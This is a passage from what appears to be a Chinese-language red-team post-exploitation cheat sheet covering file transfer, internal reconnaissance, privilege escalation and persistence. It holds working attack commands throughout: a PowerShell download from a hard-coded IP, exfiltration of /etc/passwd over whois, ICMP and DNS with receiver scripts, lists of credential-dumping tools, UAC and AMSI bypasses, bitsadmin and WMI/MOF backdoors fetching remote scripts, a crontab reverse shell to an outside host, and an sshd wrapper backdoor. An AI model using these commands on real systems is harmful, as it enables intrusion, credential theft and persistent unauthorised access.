System.Net.Webclient).DownloadString('http://95.163.202.147:8000/ooo.ps1')\n('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');\n```\n\nvbs脚本 \n```\nSet args = Wscript.Arguments\nUrl = \"http://domain/file\"\ndim xHttp: Set xHttp = createobject(\"Microsoft.XMLHTTP\")\ndim bStrm: Set bStrm = createobject(\"Adodb.Stream\")\nxHttp.Open \"GET\", Url, False\nxHttp.Send\nwith bStrm\n.type = 1 '\n.open\n.write xHttp.responseBody\n.savetofile \" C:\\%homepath%\\file\", 2 '\nend with\n```\n\u003e执行 :cscript test.vbs\n\nPerl \n```\n#!/usr/bin/perl \nuse LWP::Simple; \ngetstore(\"http://domain/file\", \"file\");\n```\n\u003e执行:perl test.pl\n\nPython \n```\n#!/usr/bin/python \nimport urllib2 \nu = urllib2.urlopen('http://domain/file') \nlocalFile = open('local_file', 'w') \nlocalFile.write(u.read()) \nlocalFile.close()\n```\n\u003e执行:python test.py\n\nRuby \n```\n#!/usr/bin/ruby\nrequire 'net/http'\nNet::HTTP.start(\"www.domain.com\") { |http|\nr = http.get(\"/file\")\nopen(\"save_location\", \"wb\") { |file|\nfile.write(r.body)\n}\n}\n```\n\u003e执行:ruby test.rb\n\nPHP \n```\n\u003c?php\n$url = 'http://www.example.com/file';\n$path = '/path/to/file';\n$ch = curl_init($url);\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n$data = curl_exec($ch);\ncurl_close($ch);\nfile_put_contents($path, $data);\n?\u003e\n```\n\u003e执行:php test.php\n\nNC \nattacker \n```\ncat file | nc -l 1234\n```\ntarget\n```\nnc host_ip 1234 \u003e file\n```\nFTP\n```\nftp 127.0.0.1 username password get file exit\n```\nTFTP \n```\ntftp -i host GET C:%homepath%file location_of_file_on_tftp_server\n```\nBitsadmin \n```\nbitsadmin /transfer n http://domain/file c:%homepath%file\n```\nWindow 文件共享 \n```\nnet use x: \\127.0.0.1\\share /user:example.comuserID myPassword\n```\nSCP \n本地到远程 \n```\nscp file user@host.com:/tmp\n```\n远程到本地 \n```\nscp user@host.com:/tmp file\n```\nrsync \n远程rsync服务器中拷贝文件到本地机 \n```\nrsync -av root@192.168.78.192::www /databack\n```\n本地机器拷贝文件到远程rsync服务器 \n```\nrsync -av /databack root@192.168.78.192::www\n```\ncertutil.exe \n```\ncertutil.exe -urlcache -split -f http://site.com/file\n```\ncopy\n```\ncopy \\\\IP\\ShareName\\file.exe file.exe\n```\nWHOIS\n接收端 Host B:\n```\nnc -vlnp 1337 | sed \"s/ //g\" | base64 -d \n```\n发送端 Host A:\n```\nwhois -h host_ip -p 1337 `cat /etc/passwd | base64`\n```\n\n[WHOIS + TAR](https://twitter.com/mubix/status/1102780436118409216)\nFirst: \n```\nncat -k -l -p 4444 | tee files.b64 #tee to a file so you can make sure you have it\n```\n\nNext\n```\ntar czf - /tmp/* | base64 | xargs -I bits timeout 0.03 whois -h host_ip -p 4444 bits\n```\n\nFinally\n```\ncat files.b64 | tr -d '\\r\\n' | base64 -d | tar zxv #to get the files out\n```\n\nPING\n发送端:\n```\nxxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done\n```\n接收端`ping_receiver.py`:\n```\nimport sys\n\ntry:\n from scapy.all import *\nexcept:\n print(\"Scapy not found, please install scapy: pip install scapy\")\n sys.exit(0)\n\n\ndef process_packet(pkt):\n if pkt.haslayer(ICMP):\n if pkt[ICMP].type == 8:\n data = pkt[ICMP].load[-4:]\n print(f'{data.decode(\"utf-8\")}', flush=True, end=\"\", sep=\"\")\n\nsniff(iface=\"eth0\", prn=process_packet)\n```\n```\npython3 ping_receiver.py\n```\n\nDIG\n发送端:\n```\nxxd -p -c 31 /etc/passwd | while read line; do dig @172.16.1.100 +short +tries=1 +time=1 $line.gooogle.com; done\n```\n接收端`dns_reciver.py`:\n```\ntry:\n from scapy.all import *\nexcept:\n print(\"Scapy not found, please install scapy: pip install scapy\")\n\ndef process_packet(pkt):\n if pkt.haslayer(DNS):\n domain = pkt[DNS][DNSQR].qname.decode('utf-8')\n root_domain = domain.split('.')[1]\n if root_domain.startswith('gooogle'):\n print(f'{bytearray.fromhex(domain[:-13]).decode(\"utf-8\")}', flush=True, end='')\n\nsniff(iface=\"eth0\", prn=process_packet)\n```\n```\npython3 dns_reciver.py\n```\n\n[Upload-Go-Fileserver](https://github.com/OlivierLaflamme/Upload-Go-Fileserver)\n```\ngo run fileserver.go -port 4040 -pass password -user username\n```\n... \n### 搭建 HTTP server\npython2\n```\npython -m SimpleHTTPServer 1337\n```\npython3\n```\npython -m http.server 1337\n```\nPHP 5.4+\n```\nphp -S 0.0.0.0:1337\n```\nruby\n```\nruby -rwebrick -e'WEBrick::HTTPServer.new(:Port =\u003e 1337, :DocumentRoot =\u003e Dir.pwd).start'\n```\n```\nruby -run -e httpd . -p 1337\n```\nPerl\n```\nperl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick-\u003enew(port=\u003e1337); $s-\u003emount(\"/\"=\u003e{path=\u003e\".\"}); $s-\u003estart'\n```\n```\nperl -MIO::All -e 'io(\":8080\")-\u003efork-\u003eaccept-\u003e(sub { $_[0] \u003c io(-x $1 +? \"./$1 |\" : $1) if /^GET \\/(.*) / })'\n```\nbusybox httpd\n```\nbusybox httpd -f -p 8000\n```\npwndrop -- 一款十分好用的投放漏洞载荷的工具\n```\n# https://github.com/kgretzky/pwndrop\n```\nSwego -- golang实现的文件上传下载服务器\n```\n# https://github.com/nodauf/Swego\n./webserver\n```\nSimpleHTTPserver -- golang实现\n```\n# https://github.com/projectdiscovery/simplehttpserver\nsimplehttpserver\n```\n\n\n\n## 内网信息搜集 \n\n### 本机信息搜集\n#### 1. 用户列表\nwindows用户列表 \n分析邮件用户,内网[域]邮件用户,通常就是内网[域]用户 \n\n#### 2. 进程列表\n析杀毒软件/安全监控工具等 \n邮件客户端 \nVPN \nftp等 \n\n#### 3. 服务列表 \n与安全防范工具有关服务[判断是否可以手动开关等]\n存在问题的服务[权限/漏洞]\n\n#### 4. 端口列表\n开放端口对应的常见服务/应用程序[匿名/权限/漏洞等]\n利用端口进行信息收集\n\n#### 5. 补丁列表\n分析 Windows 补丁\n第三方软件[Java/Oracle/Flash 等]漏洞\n\n#### 6. 本机共享\n本机共享列表/访问权限\n本机访问的域共享/访问权限\n\n#### 7. 本用户习惯分析 \n历史记录 \n收藏夹 \n文档等 \n\n#### 8. 获取当前用户密码工具 \n\n##### Windows\n* [mimikatz](https://github.com/gentilkiwi/mimikatz) \n* [wce](https://github.com/vergl4s/pentesting-dump/tree/master/net/Windows/wce_v1_42beta_x64) \n* [Invoke-WCMDump](https://github.com/peewpw/Invoke-WCMDump)\n* [mimiDbg](https://github.com/giMini/mimiDbg)\n* [LaZagne](https://github.com/AlessandroZ/LaZagne)\n* [nirsoft_package](http://launcher.nirsoft.net/downloads/)\n* [QuarksPwDump](https://github.com/quarkslab/quarkspwdump) [fgdump](https://github.com/mcandre/fgdump)\n* 星号查看器\n* [浏览器密码--HackBrowserData](https://github.com/moonD4rk/HackBrowserData)\n* [浏览器密码--BrowserGhost](https://github.com/QAX-A-Team/BrowserGhost)\n* [浏览器密码--SharpChromium](https://github.com/djhohnstein/SharpChromium)\n* [浏览器密码--chromepass](https://github.com/darkarp/chromepass) -- 获取并解密 Google Chrome, Chromium, Edge, Brave, Opera and Vivaldi 保存的cookie和密码\n* [GetPwd](https://github.com/sf197/GetPwd) -- 获取 Navicat、TeamView、Xshell、SecureCRT产品的密码\n* [FireFox-Thief](https://github.com/LimerBoy/FireFox-Thief) -- passwords, cookies, history, bookmarks\n* [Adamantium-Thief](https://github.com/LimerBoy/Adamantium-Thief) -- passwords, credit cards, history, cookies, bookmarks, autofill\n* [goLazagne](https://github.com/kerbyj/goLazagne) -- Browsers[Chromium-based;Mozilla Firefox;Internet Explorer and Edge]/Mail[Thunderbird ; [TBD] Outlook]/Windows[Credential Manager]/SysAdmin tools[Mobaxterm;Putty;Filezilla;Openssh]/WiFi passwords\n\n##### Linux\n* [LaZagne](https://github.com/AlessandroZ/LaZagne) \n* [mimipenguin](https://github.com/huntergregal/mimipenguin)\n\n### 扩散信息收集 \n#### 端口扫描 \n##### 常用端口扫描工具 \n* [nmap](https://nmap.org/) \n* [masscan](https://github.com/robertdavidgraham/masscan) \n* [zmap](https://github.com/zmap/zmap)\n* s扫描器 \n* 自写脚本等 \n* NC \n* Routerscan\n* SScan2.exe\n* [Perun](https://github.com/WyAtu/Perun) -- 可以打包为exe上传到目标进行扫描\n* [AssetScan](https://github.com/JE2Se/AssetScan) -- 集成了弱口令检测\n* [ServerScan](https://github.com/Adminisme/ServerScan) -- 可以联动CS3.14中的[CrossC2](https://github.com/gloxec/CrossC2)项目进行跨平台扫描\n* [netscan](https://github.com/jessfraz/netscan) -- Go语言写的网段端口扫描器\n* [fscan](https://github.com/shadow1ng/fscan)\n* ...\n##### 网卡信息扫描(开放135端口)\n* [Ladon](https://github.com/k8gege/Ladon)\n\n#### 内网拓扑架构分析\n* DMZ\n* 管理网\n* 生产网\n* 测试网\n\n#### 常见信息收集命令 \nipconfig:\n```\nipconfig /all ------\u003e 查询本机 IP 段,所在域等\n```\nnet:\n```\nnet user ------\u003e 本机用户列表\nnet localgroup administrators ------\u003e 本机管理员[通常含有域用户]\nnet user /domain ------\u003e 查询域用户\nnet group /domain ------\u003e 查询域里面的工作组\nnet group \"domain admins\" /domain ------\u003e 查询域管理员用户组\nnet localgroup administrators /domain ------\u003e 登录本机的域管理员\nnet localgroup administrators workgroup\\user001 /add -----\u003e域用户添加到本机 \nnet group \"domain controllers\" -------\u003e 查看域控制器(如果有多台)\nnet view ------\u003e 查询同一域内机器列表 \nnet view /domain ------\u003e 查询域列表\nnet view \u0026 net group \"domain computers\" /domain 查看当前域计算机列表 第二个查的更多\nnet view /domain:domainname\nnet view \\\\dc 查看dc域内共享文件\nnet time /domain \nnet config workstation 当前登录域 - 计算机名 - 用户名\nnet use \\\\域控(如pc.xx.com) password /user:xxx.com\\username 相当于这个帐号登录域内主机,可访问资源\n```\ndsquery \n```\ndsquery computer domainroot -limit 65535 \u0026\u0026 net group \"domain\ncomputers\" /domain ------\u003e 列出该域内所有机器名\ndsquery user domainroot -limit 65535 \u0026\u0026 net user /domain------\u003e列出该域内所有用户名\ndsquery subnet ------\u003e列出该域内网段划分\ndsquery group \u0026\u0026 net group /domain ------\u003e列出该域内分组 \ndsquery ou ------\u003e列出该域内组织单位 \ndsquery server \u0026\u0026 net time /domain------\u003e列出该域内域控制器 \n```\nquery\n```\nquery user || qwinsta------\u003e查看当前在线用户\n```\ntasklist\n```\ntasklist /svc\ntasklist /S ip /U domain\\username /P /V 查看远程计算机tasklist\n```\n\n### 第三方信息收集 \n* NETBIOS 信息收集 \n* SMB 信息收集 \n* 空会话信息收集 \n* 漏洞信息收集等 \n* 自建DNS服务器来获取内网域名对应的IP信息\n 参考项目:[DNS SOCKS Proxy](https://github.com/jtripper/dns-tcp-socks-proxy)\n 修改完配置文件之后使用如下命令就可以对内网域名进行查询:`dig @部署此项目电脑的IP地址 -p 配置文件中指定的端口 A +short 内网域名`\n* 主机关键文件以及文件内容信息查询\n 参考项目:[SharpSearch](https://github.com/djhohnstein/SharpSearch)\n \n\n## 权限提升 \n\n### Windows \n#### BypassUAC \n##### 常用方法 \n* 使用IFileOperation COM接口\n* 使用Wusa.exe的extract选项\n* 远程注入SHELLCODE 到傀儡进程\n\u003e [C_Shot](https://github.com/anthemtotheego/C_Shot)--下载,注入,在内存中执行shellcode\n* DLL劫持,劫持系统的DLL文件\n* eventvwr.exe and registry hijacking\n* sdclt.exe\n* SilentCleanup\n* wscript.exe\n* cmstp.exe\n* 修改环境变量,劫持高权限.Net程序\n* 修改注册表HKCU\\Software\\Classes\\CLSID,劫持高权限程序\n* 直接提权过UAC\n\n##### 常用工具 \n\n* [UACME ](https://github.com/hfiref0x/UACME)\n* [Bypass-UAC ](https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC)\n* [Yamabiko ](https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC/Yamabiko)\n* ... \n\n#### Bypass AMSI\n##### 常用工具 \n* [AmsiScanBufferBypass](https://github.com/rasta-mouse/AmsiScanBufferBypass)\n* [NetLoader--将二进制程序加载进内存运行,从而在运行时patching AMSI并且 bypassing Windows Defender](https://github.com/Flangvik/NetLoader)\n\n#### 提权 \n* windows内核漏洞提权\n\u003e检测类:[Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester),[WinSystemHelper](https://github.com/brianwrf/WinSystemHelper),[wesng](https://github.com/bitsadmin/wesng)\n\n\u003e利用类:[windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits),[BeRoot](https://github.com/AlessandroZ/BeRoot.git)\n\n* 服务提权 \n\u003e数据库服务,ftp服务,打印机等\n\u003e工具(具有一个服务账号之后进行提权):[Juicy Potato](https://github.com/ohpe/juicy-potato)\n\u003e Windows Spooler Vulnerability that allows an elevation of privilege on Windows 7 and later -- [CVE-2020-1337](https://github.com/neofito/CVE-2020-1337)\n* WINDOWS错误系统配置 \n* 系统服务的错误权限配置漏洞 \n* 不安全的注册表权限配置 \n* 不安全的文件/文件夹权限配置 \n* 计划任务 \n* 任意用户以NT AUTHORITY\\SYSTEM权限安装msi \n* 提权脚本 \n\u003e[PowerUP](https://github.com/HarmJ0y/PowerUp/blob/master/PowerUp.ps1),[ElevateKit](https://github.com/rsmudge/ElevateKit),[Sherlock](https://github.com/rasta-mouse/Sherlock)\n\n### Linux \n#### 内核溢出提权 \n[linux-kernel-exploits ](https://github.com/SecWiki/linux-kernel-exploits)\n#### 计划任务 \n```\ncrontab -l\nls -alh /var/spool/cron\nls -al /etc/ | grep cron\nls -al /etc/cron*\ncat /etc/cron*\ncat /etc/at.allow\ncat /etc/at.deny\ncat /etc/cron.allow\ncat /etc/cron.deny\ncat /etc/crontab\ncat /etc/anacrontab\ncat /var/spool/cron/crontabs/root\n```\n#### SUID \n```\nfind / -user root -perm -4000 -print 2\u003e/dev/null\nfind / -perm -u=s -type f 2\u003e/dev/null\nfind / -user root -perm -4000 -exec ls -ldb {} \\;\n```\n#### 系统服务的错误权限配置漏洞 \n```\ncat /var/apache2/config.inc\ncat /var/lib/mysql/mysql/user.MYD\ncat /root/anaconda-ks.cfg\n```\n\n#### 不安全的文件/文件夹权限配置 \n```\ncat ~/.bash_history\ncat ~/.nano_history\ncat ~/.atftp_history\ncat ~/.mysql_history\ncat ~/.php_history\n```\n#### 找存储的明文用户名,密码 \n```\ngrep -i user [filename]\ngrep -i pass [filename]\ngrep -C 5 \"password\" [filename]\nfind . -name \"*.php\" -print0 | xargs -0 grep -i -n \"var $password\" # Joomla\n```\n\n## 权限维持 \n\n### 系统后门 \n#### Windows \n##### 1. 密码记录工具 \nWinlogonHack \nWinlogonHack 是一款用来劫取远程3389登录密码的工具,在 WinlogonHack 之前有 一个 Gina 木马主要用来截取 Windows 2000下的密码,WinlogonHack 主要用于截 取 Windows XP 以及 Windows 2003 Server。\n键盘记录器 \n安装键盘记录的目地不光是记录本机密码,是记录管理员一切的密码,比如说信箱,WEB 网页密码等等,这样也可以得到管理员的很多信息。\nNTPass \n获取管理员口令,一般用 gina 方式来,但有些机器上安装了 pcanywhere 等软件,会导致远程登录的时候出现故障,本软件可实现无障碍截取口令。\nLinux 下 openssh 后门 \n重新编译运行的sshd服务,用于记录用户的登陆密码。\n##### 2. 常用的存储Payload位置 \n**WMI** :\n存储:\n\n```\n$StaticClass = New-Object Management.ManagementClass('root\\cimv2', $null,$null)\n$StaticClass.Name = 'Win32_Command'\n$StaticClass.Put()\n$StaticClass.Properties.Add('Command' , $Payload)\n$StaticClass.Put() \n```\n读取:\n```\n$Payload=([WmiClass] 'Win32_Command').Properties['Command'].Value\n```\n\n**包含数字签名的PE文件**\n利用文件hash的算法缺陷,向PE文件中隐藏Payload,同时不影响该PE文件的数字签名 \n**特殊ADS** \n…\n```\ntype putty.exe \u003e ...:putty.exe\nwmic process call create c:\\test\\ads\\...:putty.exe\n```\n特殊COM文件\n```\ntype putty.exe \u003e \\\\.\\C:\\test\\ads\\COM1:putty.exe\nwmic process call create \\\\.\\C:\\test\\ads\\COM1:putty.exe\n```\n磁盘根目录\n```\ntype putty.exe \u003eC:\\:putty.exe \nwmic process call create C:\\:putty.exe\n```\n##### 3. Run/RunOnce Keys \n用户级 \n```\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n```\n管理员 \n```\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n```\n##### 4. BootExecute Key \n由于smss.exe在Windows子系统加载之前启动,因此会调用配置子系统来加载当前的配置单元,具体注册表键值为:\n```\nHKLM\\SYSTEM\\CurrentControlSet\\Control\\hivelist\nHKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet002\\Control\\Session Manager\n```\n##### 5. Userinit Key \nWinLogon进程加载的login scripts,具体键值:\n```\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\n```\n##### 6. Startup Keys \n```\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n```\n##### 7. Services \n创建服务 \n```\nsc create [ServerName] binPath= BinaryPathName\n```\n##### 8. Browser Helper Objects \n本质上是Internet Explorer启动时加载的DLL模块\n```\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\n```\n##### 9. AppInit_DLLs \n加载User32.dll会加载的DLL\n```\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs\n```\n##### 10. 文件关联 \n```\nHKEY_LOCAL_MACHINE\\Software\\Classes\nHKEY_CLASSES_ROOT\n```\n##### 11. [bitsadmin](http://www.liuhaihua.cn/archives/357579.html) \n```\nbitsadmin /create backdoor\nbitsadmin /addfile backdoor %comspec% %temp%\\cmd.exe\nbitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe \"/u /s /i:https://host.com/calc.sct scrobj.dll\"\nbitsadmin /Resume backdoor\n```\n##### 12. [mof ](https://evi1cg.me/archives/Powershell_MOF_Backdoor.html)\n```\npragma namespace(\"\\\\\\\\.\\\\root\\\\subscription\") \ninstance of __EventFilter 创维A20 $EventFilter\n{\nEventNamespace = \"Root\\\\Cimv2\";\nName = \"filtP1\";\nQuery = \"Select * From __InstanceModificationEvent \"\n\"Where TargetInstance Isa \\\"Win32_LocalTime\\\" \"\n\"And TargetInstance.Second = 1\";\nQueryLanguage = \"WQL\";\n}; \ninstance of ActiveScriptEventConsumer 创维A20 $Consumer\n{\nName = \"consP1\";\nScriptingEngine = \"JScript\";\nScriptText = \"GetObject(\\\"script:https://host.com/test\\\")\";\n}; \ninstance of __FilterToConsumerBinding\n{\nConsumer = $Consumer;\nFilter = $EventFilter;\n};\n```\n管理员执行:\n```\nmofcomp test.mof\n```\n##### 13. [wmi](https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe/) \n\n每隔60秒执行一次notepad.exe\n```\nwmic /NAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter CREATE Name=\"BotFilter82\", EventNameSpace=\"root\\cimv2\",QueryLanguage=\"WQL\", Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\"\nwmic /NAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer CREATE Name=\"BotConsumer23\", ExecutablePath=\"C:\\Windows\\System32\\notepad.exe\",CommandLineTemplate=\"C:\\Windows\\System32\\notepad.exe\"\nwmic /NAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding CREATE Filter=\"__EventFilter.Name=\\\"BotFilter82\\\"\", Consumer=\"CommandLineEventConsumer.Name=\\\"BotConsumer23\\\"\"\n```\n##### 14. [Userland Persistence With Scheduled Tasks](https://3gstudent.github.io/3gstudent.github.io/Userland-registry-hijacking/) \n劫持计划任务UserTask,在系统启动时加载dll\n```\nfunction Invoke-ScheduledTaskComHandlerUserTask\n{\n[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]\nParam (\n[Parameter(Mandatory = $True)]\n[ValidateNotNullOrEmpty()]\n[String]\n$Command,\n\n[Switch]\n$Force\n)\n$ScheduledTaskCommandPath = \"HKCU:\\Software\\Classes\\CLSID\\{58fb76b9-ac85-4e55-ac04-427593b1d060}\\InprocServer32\"\nif ($Force -or ((Get-ItemProperty -Path $ScheduledTaskCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){\nNew-Item $ScheduledTaskCommandPath -Force |\nNew-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null\n}else{\nWrite-Verbose \"Key already exists, consider using -Force\"\nexit\n}\n\nif (Test-Path $ScheduledTaskCommandPath) {\nWrite-Verbose \"Created registry entries to hijack the UserTask\"\n}else{\nWrite-Warning \"Failed to create registry key, exiting\"\nexit\n} \n}\nInvoke-ScheduledTaskComHandlerUserTask -Command \"C:\\test\\testmsg.dll\" -Verbose\n```\n##### 15. [Netsh](https://3gstudent.github.io/3gstudent.github.io/Netsh-persistence/) \n```\nnetsh add helper c:\\test\\netshtest.dll\n```\n后门触发:每次调用netsh\n\u003edll编写:https://github.com/outflanknl/NetshHelperBeacon\n\n##### 16. [Shim](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Compatibility-Shims/) \n常用方式:\nInjectDll\nRedirectShortcut\nRedirectEXE\n##### 17. [DLL劫持](https://3gstudent.github.io/3gstudent.github.io/DLL%E5%8A%AB%E6%8C%81%E6%BC%8F%E6%B4%9E%E8%87%AA%E5%8A%A8%E5%8C%96%E8%AF%86%E5%88%AB%E5%B7%A5%E5%85%B7Rattler%E6%B5%8B%E8%AF%95/)\n通过Rattler自动枚举进程,检测是否存在可用dll劫持利用的进程\n使用:Procmon半自动测试更精准,常规生成的dll会导致程序执行报错或中断,使用AheadLib配合生成dll劫持利用源码不会影响程序执行\n工具:https://github.com/sensepost/rattler\n工具:https://github.com/Yonsm/AheadLib\n##### 18. [DoubleAgent ](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Verifier(DoubleAgent%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB%8D)/)\n编写自定义Verifier provider DLL\n通过Application Verifier进行安装\n注入到目标进程执行payload\n每当目标进程启动,均会执行payload,相当于一个自启动的方式\nPOC : https://github.com/Cybellum/DoubleAgent\n##### 19. [waitfor.exe ](https://3gstudent.github.io/3gstudent.github.io/Use-Waitfor.exe-to-maintain-persistence/)\n不支持自启动,但可远程主动激活,后台进程显示为waitfor.exe\nPOC : https://github.com/3gstudent/Waitfor-Persistence\n##### 20. [AppDomainManager](https://3gstudent.github.io/3gstudent.github.io/Use-AppDomainManager-to-maintain-persistence/) \n针对.Net程序,通过修改AppDomainManager能够劫持.Net程序的启动过程。如果劫持了系统常见.Net程序如powershell.exe的启动过程,向其添加payload,就能实现一种被动的后门触发机制\n##### 21. Office \n[劫持Office软件的特定功能](https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91DLL%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/):通过dll劫持,在Office软件执行特定功能时触发后门\n[利用VSTO实现的office后门](https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8VSTO%E5%AE%9E%E7%8E%B0%E7%9A%84office%E5%90%8E%E9%97%A8/)\n[Office加载项](https://github.com/3gstudent/Office-Persistence)\n* Word WLL \n* Excel XLL \n* Excel VBA add-ins \n* PowerPoint VBA add-ins\n\n\u003e参考1 :https://3gstudent.github.io/3gstudent.github.io/Use-Office-to-maintain-persistence/\n\n\u003e参考2 :https://3gstudent.github.io/3gstudent.github.io/Office-Persistence-on-x64-operating-system/\n\n\n##### 22. [CLR](https://3gstudent.github.io/3gstudent.github.io/Use-CLR-to-maintain-persistence/)\n无需管理员权限的后门,并能够劫持所有.Net程序\nPOC:https://github.com/3gstudent/CLR-Injection\n##### 23. [msdtc](https://3gstudent.github.io/3gstudent.github.io/Use-msdtc-to-maintain-persistence/) \n利用MSDTC服务加载dll,实现自启动,并绕过Autoruns对启动项的检测\n利用:向 %windir%\\system32\\目录添加dll并重命名为oci.dll\n##### 24. [Hijack CAccPropServicesClass and MMDeviceEnumerato](https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-CAccPropServicesClass-and-MMDeviceEnumerator/) \n利用COM组件,不需要重启系统,不需要管理员权限\n通过修改注册表实现\nPOC:https://github.com/3gstudent/COM-Object-hijacking \n##### 25. [Hijack explorer.exe](https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-explorer.exe/)\nCOM组件劫持,不需要重启系统,不需要管理员权限\n通过修改注册表实现\n```\nHKCU\\Software\\Classes\\CLSID{42aedc87-2188-41fd-b9a3-0c966feabec1}\nHKCU\\Software\\Classes\\CLSID{fbeb8a05-beee-4442-804e-409d6c4515e9}\nHKCU\\Software\\Classes\\CLSID{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\nHKCU\\Software\\Classes\\Wow6432Node\\CLSID{BCDE0395-E52F-467C-8E3D-C4579291692E}\n```\n##### 26. Windows FAX DLL Injection \n通过DLL劫持,劫持Explorer.exe对`fxsst.dll`的加载\nExplorer.exe在启动时会加载`c:\\Windows\\System32\\fxsst.dll`(服务默认开启,用于传真服务)将payload.dll保存在`c:\\Windows\\fxsst.dll`,能够实现dll劫持,劫持Explorer.exe对`fxsst.dll`的加载\n##### 27. 特殊注册表键值 \n在注册表启动项创建特殊名称的注册表键值,用户正常情况下无法读取(使用Win32 API),但系统能够执行(使用Native API)。\n\n[《渗透技巧——\"隐藏\"注册表的创建》](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E5%88%9B%E5%BB%BA/)\n\n[《渗透技巧——\"隐藏\"注册表的更多测试》](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E6%9B%B4%E5%A4%9A%E6%B5%8B%E8%AF%95/)\n##### 28. 快捷方式后门 \n替换我的电脑快捷方式启动参数\nPOC : https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Backdoor/LNK_backdoor.ps1\n##### 29. [Logon Scripts](https://3gstudent.github.io/3gstudent.github.io/Use-Logon-Scripts-to-maintain-persistence/) \n```\nNew-ItemProperty \"HKCU:\\Environment\\\" UserInitMprLogonScript -value \"c:\\test\\11.bat\" -propertyType string | Out-Null\n```\n##### 30. [Password Filter DLL](https://3gstudent.github.io/3gstudent.github.io/Password-Filter-DLL%E5%9C%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8/) \n##### 31. [利用BHO实现IE浏览器劫持](https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BHO%E5%AE%9E%E7%8E%B0IE%E6%B5%8F%E8%A7%88%E5%99%A8%E5%8A%AB%E6%8C%81/) \n##### 32. [SharPersist](https://github.com/fireeye/SharPersist/wiki)\n\n#### Linux \n##### crontab \n每60分钟反弹一次shell给dns.wuyun.org的53端口\n```\n#!bash\n(crontab -l;printf \"*/60 * * * * exec 9\u003c\u003e /dev/tcp/dns.wuyun.org/53;exec 0\u003c\u00269;exec 1\u003e\u00269 2\u003e\u00261;/bin/bash --noprofile -i;\\rno crontab for `whoami`%100c\\n\")|crontab -\n```\n在dns.wuyun.org的vps上可以使用[Platypus](https://github.com/WangYihang/Platypus)来对反弹的shell进行管理\n##### 硬链接sshd \n```\n#!bash\nln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333;\n```\n链接:ssh root@192.168.206.142 -p 2333\n##### SSH Server wrapper \n```\n#!bash\ncd /usr/sbin\nmv sshd ../bin\necho '#!/usr/bin/perl' \u003esshd\necho 'exec \"/bin/sh\" if (getpeername(STDIN) =~ /^..4A/);' \u003e\u003esshd\necho 'exec {\"/usr/bin/sshd\"} \"/usr/sbin/sshd\",@ARGV,' \u003e\u003esshd\nchmod u+x sshd\n//不用重启也行\n/etc/init.d/sshd restart\n```\n```\nsocat STDIO 